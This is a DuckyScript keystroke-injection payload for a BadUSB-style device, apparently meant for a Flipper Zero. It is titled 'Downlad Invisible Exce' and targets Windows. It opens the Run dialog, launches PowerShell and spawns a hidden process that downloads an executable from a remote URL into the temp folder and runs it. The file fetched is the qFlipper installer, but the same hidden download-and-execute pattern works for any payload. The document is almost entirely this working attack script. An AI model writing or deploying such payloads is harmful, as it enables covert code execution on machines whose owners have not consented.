REM ###########################################################
REM #                                                         |
REM # Title        : Downlad Invisible Exce                   |
REM # Author       : Zenin                                    |
REM # Version      : 1.0                                      |
REM # Category     : Execution                                |
REM # Target       : Windows                                  |
REM #                                                         |
REM ###########################################################
DELAY 750
DELAY 500
GUI d
DELAY 500
GUI r
DELAY 500
STRING powershell.exe
ENTER
DELAY 2000
STRING Start-Process -FilePath "powershell" -ArgumentList "/c cd $Env:temp;Invoke-WebRequest -Uri 'https://update.flipperzero.one/builds/qFlipper/1.3.3/qFlipperSetup-64bit-1.3.3.exe' -OutFile 'qFlipperSetup-64bit-1.3.3.exe'; Start-Process -FilePath '.\qFlipperSetup-64bit-1.3.3.exe'; exit" -WindowStyle Hidden; exit
ENTER
DELAY 500
GUI d